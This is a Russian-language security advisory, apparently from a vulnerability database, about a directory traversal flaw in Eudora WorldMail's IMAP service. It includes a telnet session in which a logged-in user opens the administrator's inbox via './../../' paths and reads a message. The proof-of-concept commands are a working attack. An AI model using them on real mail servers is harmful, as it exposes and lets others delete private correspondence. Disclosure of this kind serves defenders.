Обход каталога в службе IMAP в Eudora WorldMail

Дата публикации:
25.11.2005
Всего просмотров:
2196
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Eudora WorldMail 3.0, возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе.

Уязвимость существует в службе IMAP при обработке различных команд. Удаленный пользователь может просматривать и удалять письма других пользователей, а также переносить каталоги. Пример:

-----------------------------------
c:\> telnet 192.168.0.109 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

this message was sent to administrator
------------------------------------

URL производителя: www.eudora.com/worldmail/

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

или введите имя

CAPTCHA